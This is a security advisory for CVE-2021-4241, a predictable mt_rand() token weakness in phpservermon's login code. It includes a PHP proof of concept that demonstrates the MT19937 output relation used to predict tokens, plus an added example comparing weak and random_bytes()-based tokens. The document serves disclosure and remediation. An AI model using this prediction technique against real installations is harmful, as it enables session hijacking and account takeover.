Headline
CVE-2021-4241: Use of Predictable Algorithm in Random Number Generator in phpservermon
A vulnerability, which was classified as problematic, was found in phpservermon. Affected is the function setUserLoggedIn of the file src/psm/Service/User.php. The manipulation leads to use of predictable algorithm in random number generator. The exploit has been disclosed to the public and may be used. The name of the patch is bb10a5f3c68527c58073258cb12446782d223bc3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-213744.
✍️ Description
Insecure randomness errors occur when a function that can produce predictable values is used as a source of randomness in a security-sensitive context. The textbook example is code that uses the rand() function to generate “unique” identifiers for the receipt pages it generates. In this case the function that generates the weak random numbers is mt_rand(), called in User.php at line 324.
🕵️♂️ Proof of Concept
**poc.php**
```php
#!/usr/bin/env php
<?php
// Prints two mt_rand() outputs that are 227 calls apart. For MT19937 (the
// algorithm behind mt_rand()) outputs at that distance are related by the
// generator's recurrence, which is what makes the sequence predictable.
if ($argc < 3) {
    print($argv[0] . ' <seed> <offset>' . "\n");
    print("\n");
    print('Parameters:' . "\n");
    print('  seed:   Seed to initialize mt_rand() with' . "\n");
    print('  offset: Number of calls to mt_rand() before printing the first output' . "\n");
    print("\n");
    print('Output:' . "\n");
    print('  <offset>\'s call to mt_rand() and <offset+227>\'s call to mt_rand()' . "\n");
    exit(1);
}

mt_srand((int) $argv[1]);

// Discard the first <offset> outputs.
for ($i = 0; $i < (int) $argv[2]; $i++) {
    mt_rand();
}
print(mt_rand() . " ");

// Skip 226 more outputs so the next one is exactly 227 calls after the first.
for ($i = 0; $i < 226; $i++) {
    mt_rand();
}
print(mt_rand() . "\n");
```
💥 Impact
The random number generator implemented by mt_rand() cannot withstand a cryptographic attack. Because mt_rand(), like rand(), is a statistical PRNG, it is easy for an attacker to guess the strings generated from it.
🕵️♂️ Solution
When unpredictability is critical, as is the case with most security-sensitive uses of randomness, use a cryptographic PRNG. Regardless of the PRNG you choose, always use a value with sufficient entropy to seed the algorithm. (Values such as the current time offer only negligible entropy and should not be used.)
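The contrast described above, as an added example that is not code from phpservermon or from this advisory: a login-token builder in the style the report warns against (mt_rand()) next to one that uses PHP's CSPRNG interface. The function names weakToken and strongToken and the seed value are illustrative.

```php
<?php
// Added example (not from phpservermon or the advisory): contrasts a
// remember-me style token built from mt_rand() with one built from
// random_bytes(). Function names are illustrative, not the project's own.

declare(strict_types=1);

// Weak: mt_rand() is a statistical PRNG (MT19937). Its output is fully
// determined by a 32-bit seed, and later outputs can be derived from
// earlier ones, so a token built this way is predictable.
function weakToken(int $length = 32): string
{
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $token = '';
    for ($i = 0; $i < $length; $i++) {
        $token .= $alphabet[mt_rand(0, strlen($alphabet) - 1)];
    }
    return $token;
}

// Hardened: random_bytes() reads from the OS CSPRNG (PHP >= 7.0) and
// throws an Exception if no secure source is available instead of
// silently falling back to a weaker one.
function strongToken(int $bytes = 32): string
{
    return bin2hex(random_bytes($bytes));
}

// Demonstrate the predictability: with the same (for instance time-derived)
// seed the weak generator reproduces the identical token every time.
mt_srand(1337);
$first = weakToken();
mt_srand(1337);
$second = weakToken();
assert($first === $second);   // same seed => same "random" token

$a = strongToken();
$b = strongToken();
assert($a !== $b);
assert(strlen($a) === 64);    // 32 bytes, hex-encoded

echo "weak   (seed 1337): $first\n";
echo "strong            : $a\n";
```

When such a token is later compared against a stored value, use hash_equals() so the comparison does not leak timing information.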
Occurrences
References
- Breaking PHP's mt_rand() with 2 values and no bruteforce
- CWE-330: Use of Insufficiently Random Values